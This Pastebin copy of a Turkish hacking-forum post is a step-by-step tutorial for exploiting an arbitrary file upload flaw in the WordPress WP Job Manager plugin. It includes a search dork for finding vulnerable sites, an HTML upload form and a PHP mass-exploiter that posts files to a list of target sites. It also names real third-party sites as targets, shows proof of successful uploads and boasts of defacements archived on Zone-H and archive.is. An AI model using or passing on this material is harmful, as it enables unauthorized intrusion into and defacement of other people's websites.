Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Exploit Türkçe Yazarı => KingSkrupellos - Cyberizm.Org Digital Security Team
- Exploit İsmi => WordPress Plugins WP Job Manager Vulnerability Exploit Rastgele Dosya Yükleme Açığı
- Satıcı WebSitesi => wpjobmanager.com
- Konu => https://www.cyberizm.org/cyberizm-wordpress-job-manager-exploit-resimli-anlatim-05-06-2017.html
- WordPress.Org'dan İndirme Linki => wordpress.org/plugins/job-manager/
- Arama Motoru Aratma Dorku => inurl:''/wp-content/plugins/wp-job-manager/''
- Arama Motorundan çıkan herhangi bir Sitede Açık olup olmadığını öğrenmenin yolu =>
- 1. Öğrenme Yolu =>
- HEDEFSITE/jm-ajax/upload_file/
- Karşımıza Dosya Yüklemeyle alakalı bir ekranda şu yazı yazması gerekiyor : '' {"files":[]} ''
- 2. Öğrenme Yolu =>
- HEDEFSITE/post-a-job => İki şekilde olabiliyor => No Results Found => Hiçbir sonuç bulunamadı. Hemen paniğe kapılmayın. Belki açık vardır diye yola devam ediyoruz.
- [img]https://i.hizliresim.com/WQWomQ.png[/img]
- İkincisi direk upload ekranı sitenin üzerinde o da güzel. Hemen uygulayalım.
- Örnek Site => securise.in
- [img]https://i.hizliresim.com/1gj79b.png[/img]
- [img]https://i.hizliresim.com/zBQy69.png[/img]
- [img]https://i.hizliresim.com/LndGJz.png[/img]
- Karşımıza Direk '' Add a Job '' ekranlı direk en altta '' Dosya Seç '' işaretli bir yükleme yeri gelmesi gerekiyor.
- E-Mail'i sallayın @ olması gerekiyor. Doldurulması gerekiyorsa * yıldız işareti oluyor. Çoğu zaman doldurmanıza gerek yok.
- En altta .jpg .png .gif uzantılı kendinize ait hacked resmini siteye yükleyebilirsiniz.
- Son Zamanlarda Zone-H.Org'da çok fazla gördüğüm için paylaşıyım dedim. Ekmek su gibi gidiyor mübarek :D
- Örnek Site =>
- securise.in/jm-ajax/upload_file
- Archive Kaydı => archive.is/9fjCm
- Dosyamız Nereye yükleniyor peki ?
- HEDEFSITE/wp-content/uploads/job-manager-uploads/company_logo/YIL/GÜN/DOSYANIZIN-İSMİ.png
- Maalesef shell.php.jpg gibi ve buna benzer şekilde Shell Yüklenemiyor.
- WordPress Plugins WP Job Manager Exploit Kodumuz =>
- [hide][code]<form method="POST" action="https://localhost/jm-ajax/upload_file/" enctype="multipart/form-data">
- <input type="file" name="files[]" />
- <button>Upload!</button><br/>
- </form>[/code][/hide]
- WordPress Plugins WP Job Manager Exploit Uygulamalı Resimli Anlatım =>
- Herşeyden önce hedef sitemizi belirliyoruz. => Örnek HedefSite => shephardashmore.com
- [img]https://i.hizliresim.com/6XYMd9.png[/img]
- 1) İlk önce XAMPP yada PHP çalıştırabileceğimiz LocalHost üzerinden sitelere yükleme yapacağımızdan dolayı XAMPP'ı uygun işletim sistemine göre indirmemiz gerekiyor.
- apachefriends.org/tr/index.html
- [img]https://i.hizliresim.com/r2Yyqz.png[/img]
- [img]https://i.hizliresim.com/3q2gQp.png[/img]
- 2) Ardından XAMPP'ı kurduktan sonra çalıştırmamız gerekiyor. Başlat + Çalıştır + XAMPP Control Panel + Hepsini Çalıştır [ Apache + MySQL + FileZilla + Mercury + Tomcat ]
- 3) Sonra Exploiti Kodumuzu içini düzenliyoruz.
- <form method="POST" action="https://HEDEFSITEYİ-BURAYA-YAZIN/jm-ajax/upload_file/" enctype="multipart/form-data">
- Diğer alttaki kodları oynamayın. Yukarıda tam olarak exploiti kodunu verdim zaten.
- [img]https://i.hizliresim.com/RPEG2n.png[/img]
- 4) Sonra Başlat + Çalıştır + XAMPP HtDocs Folder'ın içerisine yukarıdaki verdiğim exploit kodunu .html uzantılı dosyamızı buraya ekliyoruz. mesela ben wp-jobmanager.html diye yaptım. dosya isminin ne olduğu önemli değil. .html olsun yeterli.
- Dikkat YerelAğ üzerinde çalıştırıyoruz.
- [img]https://i.hizliresim.com/pWv2ln.png[/img]
- Örnek => file:///C:/xampp/htdocs/wordpress-exploits/wp-jobmanager.html
- 5) Dosya Seç / Dosya Seçilmedi / Dosya Yükle / diye bir ekran gelicek. Dosya Yüklüyoruz.
- [img]https://i.hizliresim.com/0BbrYo.png[/img]
- Yükledikten Sonra bize dosyamızın siteye yüklendiğine dair uyarı veriyor.
- Örnek Dosyanın Yüklendiğine Dair Kanıt =>
- {"files":[{"url":"http:\/\/shephardashmore.com\/wp-content\/uploads\/job-manager-uploads\/files\/2017\/06\/cyberizm.png","file":"\/var\/www\/vhosts\/shephardashmore.com\/httpdocs\/wp-content\/uploads\/job-manager-uploads\/files\/2017\/06\/cyberizm.png","name":"cyberizm.png","type":"image\/png","size":1177310,"extension":"png"}]}
- Sitede uğraştığımız [ cyberizm.png - cyberizm.jpg - cdst.png - kingskrupellos.jpg - kingskrupellos.png ] adlı dosyalarım siteye yüklenmiş bulunmakta. Hemen ünlü mirror sitesi archive.is'e kayıt alıyorum ve burada işimi bitiriyorum.
- [img]https://i.hizliresim.com/4MY9EJ.png[/img]
- [code]http://archive.is/www.shephardashmore.com[/code]
- [img]https://i.hizliresim.com/JldW0j.png[/img]
- [img]https://i.hizliresim.com/OLJaGP.png[/img]
- Ayrıca buna ilaveten son olarak söylemek istediğim konu ise =>
- Mozilla Firefox kullanarak bazı sitelerde %60 oranında Tamper Data kullanarak .php ve .txt .html dosya yükleyebiliriz.
- Ayrıca WordPress Job Manager Auto Mass PHP Exploiter
- [code]<?php
- # KingSkrupellos - Cyberizm.Org Digital Security Technological Turkish Moslem Army
- # https://www.cyberizm.org/cyberizm-wordpress-job-manager-exploit-resimli-anlatim-05-06-2017.html
- $nama = "target.html";
- $buka=fopen("$nama","r");
- $size=filesize("$nama");
- $baca=fread($buka,$size);
- $sites = explode("\r\n", $baca);
- foreach($sites as $site){
- if(preg_match("#http://#", $site)) {
- $suu = $site;
- } else {
- $suu = "http://".$site;
- }
- echo "$suu ->";
- $file = "k.png";
- $site = "$suu/jm-ajax/upload_file/";
- $post = array(
- "file" => "@$file",
- );
- $ch = curl_init ("$site");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data6 = curl_exec ($ch);
- if (preg_match("/$file/i", $data6)){
- $save = "$suu/wp-content/uploads/job-manager-uploads/file/2017/06/$file";
- echo " \n$save\n";
- }else{
- echo " \nNo\n"; }
- }
- ?>[/code]
- [code]# -----------------------------18132430516394\r\n
- # Content-Disposition: form-data; name="script"\r\n
- # \r\n
- # true\r\n
- # -----------------------------18132430516394\r\n
- # Content-Disposition: form-data; name="company_logo"; filename="kingskrupellos.txt"\r\n
- # Content-Type: image/jpeg\r\n
- # \r\n[/code]
- İşlem Bu Kadar Basit. [ Use Your Brain ]
- Birdahakine bu kadar ince ayrıntısına kadar anlatmam. Değerimi bilin :D
- ### CyBeRiZM.Org Digital Security Technological Turkish Moslem Army. Mr. KingSkrupellos ###
- __________________________________________________________________________
- Alın Size Exploit - Dağıtın Etrafı =>
- @OrJiNaL @the_zizil @Lynx @Stallk3r @DarkRivın @JOYGAL @Kulmec @DARKDAYS
- @Leader Shawai @Julian @BUSE
- %100 Alıntısız Tamamen Orjinal konu böyle olur işte değil mi :D Yenilere konu açacak olanlara bunu göstermek lazım :D
- @Mr.F92 @Ayar
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement